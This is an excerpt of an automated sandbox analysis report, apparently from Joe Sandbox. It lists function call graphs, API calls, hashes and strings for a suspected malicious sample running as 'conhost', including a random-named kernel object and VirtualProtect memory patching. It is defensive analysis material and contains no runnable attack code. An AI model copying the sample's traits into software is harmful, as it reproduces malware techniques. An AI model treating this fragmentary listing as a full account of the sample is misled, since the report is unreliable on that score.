Function_0000000140002691 70 Function_0000000140005891 71->28 71->64 72 Function_0000000140002194 72->55 73 Function_000000014000219E 74 Function_0000000140001FA0 75->32 80 Function_00000001400023B0 75->80 91 Function_00000001400024D0 75->91 76 Function_00000001400057A1 77 Function_00000001400059A1 78->71 79->71 82 Function_00000001400022B0 83 Function_00000001400026B0 84 Function_00000001400030B1 85 Function_0000000140001AB3 85->32 85->75 88 Function_00000001400058C1 89 Function_0000000140001AC3 89->32 89->75 90 Function_00000001400014C7 90->71 92 Function_00000001400017D0 93 Function_0000000140001FD0 94 Function_00000001400026D0 95 Function_00000001400057D1 96 Function_0000000140001AD4 96->32 96->75 97->71 98 Function_00000001400022E0 99->1 99->5 99->13 99->19 99->40 99->41 99->43 99->54 99->62 99->79 99->90 101 Function_00000001400017E0 101->100

                                          Executed Functions

                                          Function 0000000140001394 Relevance: 1.5, APIs: 1, Instructions: 24nativeCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          APIs
                                          • NtThawTransactions.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000140001156), ref: 00000001400013F7
                                          Memory Dump Source
                                          • Source File: 0000003C.00000002.346490703757.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                          • Associated: 0000003C.00000002.346490667347.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                          • Associated: 0000003C.00000002.346490752502.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                          • Associated: 0000003C.00000002.346490797779.0000000140009000.00000004.00000001.00020000.00000000.sdmpDownload File
                                          • Associated: 0000003C.00000002.346490840943.000000014000A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_60_2_140000000_conhost.jbxd
                                          Similarity
                                          • API ID: ThawTransactions
                                          • String ID:
                                          • API String ID: 578639242-0
                                          • Opcode ID: fa4ca29ffdbb80e8efa36c8b47f0284b0c6112ac4f40b8b01a9a1a958d5a0fea
                                          • Instruction ID: 9f9578cccb19d5e1001a2b70783b1425a960e143c3f7cfc78ac85dbae06a86f6
                                          • Opcode Fuzzy Hash: fa4ca29ffdbb80e8efa36c8b47f0284b0c6112ac4f40b8b01a9a1a958d5a0fea
                                          • Instruction Fuzzy Hash: DCF0AFB2608B408AEA12DF52F89579A77A0F38D7C0F00991ABBC847735DB3CC190CB40

                                          Non-executed Functions

                                          Function 00000001400026E0 Relevance: 19.6, APIs: 7, Strings: 4, Instructions: 376COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 311 1400026e0-14000273b call 140002660 315 140002741-14000274b 311->315 316 14000280e-14000285e call 14000155d 311->316 318 140002774-14000277a 315->318 323 140002953-14000297b call 1400014c7 316->323 324 140002864-140002873 316->324 318->316 319 140002780-140002787 318->319 321 140002789-140002792 319->321 322 140002750-140002752 319->322 325 140002794-1400027ab 321->325 326 1400027f8-1400027fb 321->326 330 14000275a-14000276e 322->330 339 140002986-1400029c8 call 140001503 call 140005a80 323->339 340 14000297d 323->340 328 140002eb7-140002ef4 call 140001370 324->328 329 140002879-140002888 324->329 331 1400027f5 325->331 332 1400027ad-1400027c2 325->332 326->330 335 1400028e4-14000294e wcsncmp call 1400014e5 329->335 336 14000288a-1400028dd 329->336 330->316 330->318 331->326 338 1400027d0-1400027d7 332->338 335->323 336->335 342 1400027d9-1400027f3 338->342 343 140002800-140002809 338->343 349 140002e49-140002e84 call 140001370 339->349 350 1400029ce-1400029d5 339->350 340->339 342->331 342->338 343->330 353 1400029d7-140002a0c 349->353 358 140002e8a 349->358 352 140002a13-140002a43 wcscpy wcscat wcslen 350->352 350->353 355 140002a45-140002a76 wcslen 352->355 356 140002a78-140002aa5 352->356 353->352 357 140002aa8-140002abf wcslen 355->357 356->357 359 140002ac5-140002ad8 357->359 360 140002e8f-140002eab call 140001370 357->360 358->352 361 140002af5-140002dfb wcslen call 1400014a9 * 2 call 1400014f4 call 1400014c7 * 2 call 14000145e * 3 359->361 362 140002ada-140002aee 359->362 360->328 381 140002dfd-140002e1b call 140001512 361->381 382 140002e20-140002e48 call 14000145e 361->382 362->361 381->382
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000003C.00000002.346490703757.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                          • Associated: 0000003C.00000002.346490667347.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                          • Associated: 0000003C.00000002.346490752502.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                          • Associated: 0000003C.00000002.346490797779.0000000140009000.00000004.00000001.00020000.00000000.sdmpDownload File
                                          • Associated: 0000003C.00000002.346490840943.000000014000A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_60_2_140000000_conhost.jbxd
                                          Similarity
                                          • API ID: wcslen$wcscatwcscpywcsncmp
                                          • String ID: 0$X$\BaseNamedObjects\abwgotxjezxhqvoxfvghoubb$`
                                          • API String ID: 597572034-149918156
                                          • Opcode ID: f82b1d56fbcdcc59e5ec635660479513eccb0500ba3604f01a9d24aae7d58353
                                          • Instruction ID: 1f23fed1b35a9de6ab45ac7882f8aac31199291c16d80d346fc09940143c1c50
                                          • Opcode Fuzzy Hash: f82b1d56fbcdcc59e5ec635660479513eccb0500ba3604f01a9d24aae7d58353
                                          • Instruction Fuzzy Hash: DB1258B2608B8481E762CB16F8443EAB7A4F789794F414215EBA957BF5EF78C189C700
                                          Function 0000000140001160 Relevance: 13.6, APIs: 9, Instructions: 130sleepstringCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          APIs
                                          Memory Dump Source
                                          • Source File: 0000003C.00000002.346490703757.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                          • Associated: 0000003C.00000002.346490667347.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                          • Associated: 0000003C.00000002.346490752502.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                          • Associated: 0000003C.00000002.346490797779.0000000140009000.00000004.00000001.00020000.00000000.sdmpDownload File
                                          • Associated: 0000003C.00000002.346490840943.000000014000A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_60_2_140000000_conhost.jbxd
                                          Similarity
                                          • API ID: malloc$ExceptionFilterSleepUnhandled_amsg_exit_cexit_inittermmemcpystrlen
                                          • String ID:
                                          • API String ID: 2643109117-0
                                          • Opcode ID: ef832b105ad0a93b86892325d7c46da591e0916a2414edd2e41ce77350403375
                                          • Instruction ID: 40b87442000c13bc5d8894cea73eda9f1f07301f31752595899968347b94dbbc
                                          • Opcode Fuzzy Hash: ef832b105ad0a93b86892325d7c46da591e0916a2414edd2e41ce77350403375
                                          • Instruction Fuzzy Hash: DA5133B1601A4485FB12EF27F9947EA27A5BB8D7C0F408121FB4D873B6DE38C4958300
                                          Function 0000000140001BA0 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 106memoryCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 427 140001ba0-140001bc0 428 140001bc2-140001bd7 427->428 429 140001c09 427->429 430 140001be9-140001bf1 428->430 431 140001c0c-140001c17 call 1400023b0 429->431 432 140001bf3-140001c02 430->432 433 140001be0-140001be7 430->433 437 140001cf4-140001cfe call 140001d40 431->437 438 140001c1d-140001c6c call 1400024d0 VirtualQuery 431->438 432->433 435 140001c04 432->435 433->430 433->431 439 140001cd7-140001cf3 memcpy 435->439 442 140001d03-140001d1e call 140001d40 437->442 438->442 445 140001c72-140001c79 438->445 446 140001d23-140001d38 GetLastError call 140001d40 442->446 447 140001c7b-140001c7e 445->447 448 140001c8e-140001c97 445->448 450 140001cd1 447->450 451 140001c80-140001c83 447->451 452 140001ca4-140001ccf VirtualProtect 448->452 453 140001c99-140001c9c 448->453 450->439 451->450 455 140001c85-140001c8a 451->455 452->446 452->450 453->450 456 140001c9e 453->456 455->450 457 140001c8c 455->457 456->452 457->456
                                          APIs
                                          • VirtualQuery.KERNEL32(?,?,?,?,0000000140007C98,0000000140007C98,?,?,0000000140000000,?,0000000140001991), ref: 0000000140001C63
                                          • VirtualProtect.KERNEL32(?,?,?,?,0000000140007C98,0000000140007C98,?,?,0000000140000000,?,0000000140001991), ref: 0000000140001CC7
                                          • memcpy.MSVCRT ref: 0000000140001CE0
                                          • GetLastError.KERNEL32(?,?,?,?,0000000140007C98,0000000140007C98,?,?,0000000140000000,?,0000000140001991), ref: 0000000140001D23
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000003C.00000002.346490703757.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                          • Associated: 0000003C.00000002.346490667347.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                          • Associated: 0000003C.00000002.346490752502.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                          • Associated: 0000003C.00000002.346490797779.0000000140009000.00000004.00000001.00020000.00000000.sdmpDownload File
                                          • Associated: 0000003C.00000002.346490840943.000000014000A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_60_2_140000000_conhost.jbxd
                                          Similarity
                                          • API ID: Virtual$ErrorLastProtectQuerymemcpy
                                          • String ID: VirtualProtect failed with code 0x%x$ VirtualQuery failed for %d bytes at address %p$Address %p has no image-section
                                          • API String ID: 2595394609-2123141913
                                          • Opcode ID: 7f9f54528f52ba38c440ef3f049e77ffae0268e46db4b29bcd0fd62edeedcd28
                                          • Instruction ID: fdf3d9dd88e8792b1161c01240395ef5b5338fb4321909a58f15fe856704e636
                                          • Opcode Fuzzy Hash: 7f9f54528f52ba38c440ef3f049e77ffae0268e46db4b29bcd0fd62edeedcd28
                                          • Instruction Fuzzy Hash: 4D4143F1601A4586FA26DF47F884BE927A0E78DBC4F554126EF0E877B1DA38C586C700
                                          Function 0000000140002104 Relevance: 7.6, APIs: 5, Instructions: 51COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 458 140002104-14000210b 459 140002111-140002128 EnterCriticalSection 458->459 460 140002218-140002221 458->460 461 14000220b-140002212 LeaveCriticalSection 459->461 462 14000212e-14000213c 459->462 463 140002272-140002280 460->463 464 140002223-14000222d 460->464 461->460 465 14000214d-140002159 TlsGetValue GetLastError 462->465 466 140002241-140002263 DeleteCriticalSection 464->466 467 14000222f 464->467 468 14000215b-14000215e 465->468 469 140002140-140002147 465->469 466->463 470 140002230-14000223f 467->470 468->469 471 140002160-14000216d 468->471 469->461 469->465 470->466 471->469
                                          APIs
                                          Memory Dump Source
                                          • Source File: 0000003C.00000002.346490703757.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                          • Associated: 0000003C.00000002.346490667347.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                          • Associated: 0000003C.00000002.346490752502.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                          • Associated: 0000003C.00000002.346490797779.0000000140009000.00000004.00000001.00020000.00000000.sdmpDownload File
                                          • Associated: 0000003C.00000002.346490840943.000000014000A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_60_2_140000000_conhost.jbxd
                                          Similarity
                                          • API ID: CriticalSection$DeleteEnterErrorLastLeaveValue
                                          • String ID:
                                          • API String ID: 926137887-0
                                          • Opcode ID: 0ffba56e4192c3090559e2b70388a71b78ee459ef6202966799b3bd691e8aca8
                                          • Instruction ID: 793acaa3a830b4be65b1b016115a986f044ad1924a79c217c83acc240df584b7
                                          • Opcode Fuzzy Hash: 0ffba56e4192c3090559e2b70388a71b78ee459ef6202966799b3bd691e8aca8
                                          • Instruction Fuzzy Hash: 3521E3B0705A0292FA5BEB53F9483E92360B76CBD0F444021FB1E476B4DB7A8986C300
                                          Function 0000000140001880 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 138memoryCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 474 140001880-14000189c 475 1400018a2-1400018f9 call 140002420 call 140002660 474->475 476 140001a0f-140001a1f 474->476 475->476 481 1400018ff-140001910 475->481 482 140001912-14000191c 481->482 483 14000193e-140001941 481->483 484 14000194d-140001954 482->484 485 14000191e-140001929 482->485 483->484 486 140001943-140001947 483->486 489 140001956-140001961 484->489 490 14000199e-1400019a6 484->490 485->484 487 14000192b-14000193a 485->487 486->484 488 140001a20-140001a26 486->488 487->483 492 140001b87-140001b98 call 140001d40 488->492 493 140001a2c-140001a37 488->493 494 140001970-14000199c call 140001ba0 489->494 490->476 491 1400019a8-1400019c1 490->491 495 1400019df-1400019e7 491->495 493->490 496 140001a3d-140001a5f 493->496 494->490 499 1400019e9-140001a0d VirtualProtect 495->499 500 1400019d0-1400019dd 495->500 501 140001a7d-140001a97 496->501 499->500 500->476 500->495 504 140001b74-140001b82 call 140001d40 501->504 505 140001a9d-140001afa 501->505 504->492 511 140001b22-140001b26 505->511 512 140001afc-140001b0e 505->512 515 140001b2c-140001b30 511->515 516 140001a70-140001a77 511->516 513 140001b5c-140001b6c 512->513 514 140001b10-140001b20 512->514 513->504 518 140001b6f call 140001d40 513->518 514->511 514->513 515->516 517 140001b36-140001b57 call 140001ba0 515->517 516->490 516->501 517->513 518->504
                                          APIs
                                          • VirtualProtect.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000140001247), ref: 00000001400019F9
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000003C.00000002.346490703757.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                          • Associated: 0000003C.00000002.346490667347.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                          • Associated: 0000003C.00000002.346490752502.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                          • Associated: 0000003C.00000002.346490797779.0000000140009000.00000004.00000001.00020000.00000000.sdmpDownload File
                                          • Associated: 0000003C.00000002.346490840943.000000014000A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_60_2_140000000_conhost.jbxd
                                          Similarity
                                          • API ID: ProtectVirtual
                                          • String ID: Unknown pseudo relocation bit size %d.$ Unknown pseudo relocation protocol version %d.
                                          • API String ID: 544645111-395989641
                                          • Opcode ID: ee5502d3effd7a536878bdf8aefb10f3e022fdfcb9b8ee8412db7f6aa0d5b7eb
                                          • Instruction ID: 5534edb58951571e9cddb68e2d52a890a1341d8cf7b14363ea8337f027b41872
                                          • Opcode Fuzzy Hash: ee5502d3effd7a536878bdf8aefb10f3e022fdfcb9b8ee8412db7f6aa0d5b7eb
                                          • Instruction Fuzzy Hash: 215114B6B11544DAEB12CF67F840BE827A1A759BE8F548212FB1D077B4DB38C986C700
                                          Function 0000000140001800 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 30COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 522 140001800-140001810 523 140001812-140001822 522->523 524 140001824 522->524 525 14000182b-140001867 call 140002290 fprintf 523->525 524->525
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000003C.00000002.346490703757.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                          • Associated: 0000003C.00000002.346490667347.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                          • Associated: 0000003C.00000002.346490752502.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                          • Associated: 0000003C.00000002.346490797779.0000000140009000.00000004.00000001.00020000.00000000.sdmpDownload File
                                          • Associated: 0000003C.00000002.346490840943.000000014000A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_60_2_140000000_conhost.jbxd
                                          Similarity
                                          • API ID: fprintf
                                          • String ID: Unknown error$_matherr(): %s in %s(%g, %g) (retval=%g)
                                          • API String ID: 383729395-3474627141
                                          • Opcode ID: 5380d33896c543ae4d996441b91b9d4166eeb0315ccd011cd80e0432b11e09cd
                                          • Instruction ID: 93f4737d0fcd475ad391b7eda42db172c0a352a5f8679ae3d0accb20e8169252
                                          • Opcode Fuzzy Hash: 5380d33896c543ae4d996441b91b9d4166eeb0315ccd011cd80e0432b11e09cd
                                          • Instruction Fuzzy Hash: 96F09671A14A4482E612EF6AB9417ED6360E75D7C1F50D211FF4D576A5DF3CD182C310
                                          Function 000000014000219E Relevance: 5.0, APIs: 4, Instructions: 34COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 528 14000219e-1400021a5 529 140002272-140002280 528->529 530 1400021ab-1400021c2 EnterCriticalSection 528->530 531 140002265-14000226c LeaveCriticalSection 530->531 532 1400021c8-1400021d6 530->532 531->529 533 1400021e9-1400021f5 TlsGetValue GetLastError 532->533 534 1400021f7-1400021fa 533->534 535 1400021e0-1400021e7 533->535 534->535 536 1400021fc-140002209 534->536 535->531 535->533 536->535
                                          APIs
                                          Memory Dump Source
                                          • Source File: 0000003C.00000002.346490703757.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                          • Associated: 0000003C.00000002.346490667347.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                          • Associated: 0000003C.00000002.346490752502.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                          • Associated: 0000003C.00000002.346490797779.0000000140009000.00000004.00000001.00020000.00000000.sdmpDownload File
                                          • Associated: 0000003C.00000002.346490840943.000000014000A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_60_2_140000000_conhost.jbxd
                                          Similarity
                                          • API ID: CriticalSection$EnterErrorLastLeaveValue
                                          • String ID:
                                          • API String ID: 682475483-0
                                          • Opcode ID: 6aed334ba28e281145827aad8106e07ad7f1f3d084932f70a39d4ad6c8ab7699
                                          • Instruction ID: fd5d896073a876b2497a5a253350f949cfb4402a0739e06ef74f700dacb1e49b
                                          • Opcode Fuzzy Hash: 6aed334ba28e281145827aad8106e07ad7f1f3d084932f70a39d4ad6c8ab7699
                                          • Instruction Fuzzy Hash: 0801AFB5705A0192FA5BDB53FE083E86260B76CBD1F454021EF0953AB4DB798996C200